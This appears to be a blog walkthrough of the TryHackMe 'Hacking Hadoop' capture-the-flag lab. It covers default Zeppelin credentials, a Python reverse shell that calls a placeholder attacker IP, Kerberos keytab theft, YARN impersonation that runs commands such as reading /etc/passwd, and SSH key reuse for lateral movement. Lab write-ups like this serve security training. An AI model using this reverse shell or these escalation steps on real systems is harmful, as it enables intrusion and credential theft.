HACKING HADOOP TryHackMe

LINK TO THE ROOM : https://tryhackme.com/room/hackinghadoop

Download VPN file

Start the machine, and regular your regular openvpn file then run the vpn file u just downloaded from here while keeping the regular openvpn file running in background.

and run the command :

Now, we can check if everything is setup by doing:

Let’s get to the questions now:

TASK 2 : Understanding the datalake

Which node is responsible for actively keeping the directory tree structure of the datalake?

What type of node provides applications for users?

What Hadoop service is responsible for scheduling jobs?

What Hadoop service provides granular access control to resources?

What is the term provided to a datalake that makes use of Kerberos for security?

Who owns the largest Hadoop cluster in the world?

TASK 3 : All aboard the Hindenburg

I scanned the Host 172.23.0.3 by doing:

What edge node service is running on this host?

What file is responsible for the authentication configuration for this service?

hint: Since Apache Zeppelin is open source, google Apache Zeppelin Authentication, this will point you in the right direction.

What is the username and password combination that gives you your initial entry?

tried admin but it was not active as given in the hint. then user1 worked.

let’s sign in using these creds by going to http://172.23.0.3:8080.

Once authenticated, submit the flag that is hiding nicely in one of the notebooks.

flag in the NOTEBOOKS

after signing in we can go to TESTNODE and see the flag right there.
PS: don’t rush for revshell, first take the flag from here 🥸.

TASK 4 : Rocking It Like led

What is the password of the user allowed to interface with the interpreters and provided notebook?

on the same notebook in task 3, if u scroll down u can find this.

Which active interpreter can be used to execute code?

Now we have the username and password let’s horizontally escalate our privilege. And create a new note and input our code for reverse shell.
Now all that is left is to hit run.

CODE:

import socket,os,pty;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect((“<attacker IP>”,<port>));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
pty.spawn(“/bin/sh”)

Noiceeee we have a rev shell on the system. let’s answer some questions then.

What OS user does the application run as?

What is the value of the flag found in the user’s home directory (flag2.txt)?

flag2.txt

TASK 5 : Keeping tabs on all these keys

After reading the task i found out that, finding the keytabs is necessary and most important work to do right now so ran a find command to find the keytab files on the host.

Which directory stores the keytabs for the Hadoop services?

What is the keytab file’s name associated with the compromised user?

What is the first principal stored in this keytab file?

What is the full verbose command to authenticate with this keytab using the full file path?

flag3.txt

What is the value of the flag stored in the compromised user’s HDFS home directory (flag3.txt)?

TASK 6 : A great big ball of Yarn

used touchz to create a file in /tmp

What is the name of the service we will attempt to impersonate for privilege escalation?

To move ahead i had to take a look at OPTION 5 of the GitHub link given in the task on how to run remote commands.

What is the value of the flag in the impersonated user’s HDFS home directory (flag4.txt)?

flag4.txt
  • -input <a non empty file on HDFS>: this will be provided as input to MapReduce for the command to be executed, just put at least a character in that file, this file is useless for our objective
  • -output <a nonexistant directory on HDFS>: this directory will be used by MapReduce to write the result, either _SUCCESS or failure
  • -mapper <your single command>: the command to execute, for instance "/bin/cat /etc/passwd". The output result will be written in the -output directory
  • -reducer NONE: there is no need for a reducer to execute a single command, a mapper is enough

this is the command i used to read /etc/passwd and with a few changes read the flag file which are not permitted to be read.

What is the value of the flag in the impersonated user’s OS home directory (flag5.txt)?

flag5.txt

Task 7 : Assistant to the regional Node

What is the value of the flag associated with the NodeManager’s HDFS home directory (flag6.txt)?

Let’s get keytab of nm user to get the next flag.

to get the flag i want you to follow these commands step by step.

and suppose u r getting a error like “this directory /tmp/webby2 already exists” then just change the name from webby2 to something like webby3 or webby4 anything other than webby2. Hope you got it!.

flag6.txt

What is the value of the flag associated with the NodeManager’s OS home directory (flag7.txt)?

— — — — — — — — — — — — — — — — — — — —

i tried to get ssh to make my misery a little less painful but wasn’t able to get into, after getting the id_rsa key 🥸 i was unable to login.

Then I had to change my approach a little.

— — — — — — — — — — — — — — — — — — — — —

follow these commands as they are and you should get your next flag.

flag7.txt

TASK 8: I:heart:root

What is the value of the flag in the root user’s home directory (flag8.txt)?

flag8.txt

ps: this flag was soo trueeeee!!!!!!!

What is the value of the flag in the root user’s HDFS home directory (flag9.txt)?

flag9.txt

TASK 10 : Surfing the datalake

What is the value of the flag in the root user’s directory on the secondary cluster node (flag10.txt)?

The id_rsa key I found earlier turned out to be the id_rsa key for 172.23.0.4 hence used it and logged in easily. And the flag was waiting right away for me.

{thanks Nguyen Van Tien from DISC for helping with this part coz i coudln’t have guessed on my own that this is the ssh for 172.23.0.4 😅}

flag10.txt

AND FINALLY THE ROOM IS COMPLETED!! 🎉🥳

Special Thanks to am03bam4n for making this soul sucking room and guiding me through the room. and not letting me go insane haha.

HAPPY HACKING 🥳🥳🥳🎉🎉

linktree: https://linktr.ee/RishabhRai

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store